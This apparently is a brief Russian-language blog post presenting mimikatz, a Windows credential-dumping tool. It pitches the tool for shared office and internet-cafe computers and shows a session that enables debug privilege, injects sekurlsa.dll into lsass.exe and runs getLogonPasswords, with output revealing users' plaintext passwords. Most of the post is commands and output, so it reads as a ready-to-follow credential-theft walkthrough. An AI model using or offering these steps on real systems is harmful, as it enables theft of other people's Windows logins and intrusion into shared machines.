Windows и mimikatz
- 26.02.12, 10:02
- Мой компьютер
Крепкая дружба.
KiwiCmd.exe
KiwiRegedit.exe
KiwiTaskmgr.exe
mimikatz.exe
И драйвер - mimikatz.sys
Актуально для офисов многопользовательских систем, интернет кафе и прочих подобных.
mimikatz # privilege::debug
Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK
Description du module : Standard
cls - Efface l'ecran (ne fonctionne pas en execution distante, via PsExec par exemple)
exit - Quitte MimiKatz
reponse - Calcule la reponse a la Grande Question sur la Vie, l'Universet le Reste
cite - Trouve une citation
version - Retourne la version de mimikatz
test - Routine de test (ne devrait plus etre la en release...)
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 812
Attente de connexion du client...
Serveur connecte a un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donnees de securites dans LSASS
mimikatz # @getLogonPasswords
Authentification Id :
Package d'authentification : NTLM
Utilisateur principal : ЮзверьГ
Domaine d'authentification : СетевоеИмяСистемы
msv1_0 : lm{ lm кэш }, ntlm{ ntlm кэш }
wdigest : ПарольЮзверьГа в чистом виде
tspkg : ПарольЮзверьГа в чистом виде
Authentification Id :
Package d'authentification : Negotiate
Utilisateur principal : СетевоеИмяСистемы$
Domaine d'authentification : Домен
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)
Authentification Id :
Package d'authentification : NTLM
Utilisateur principal : СетевоеИмяСистемы$
Domaine d'authentification : Домен
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)
Description du module : Standard
cls - Efface l'ecran (ne fonctionne pas en execution distante, via PsExec par exemple)
exit - Quitte MimiKatz
reponse - Calcule la reponse a la Grande Question sur la Vie, l'Universet le Reste
cite - Trouve une citation
version - Retourne la version de mimikatz
test - Routine de test (ne devrait plus etre la en release...)
Crystal палит легко.
2
Коментарі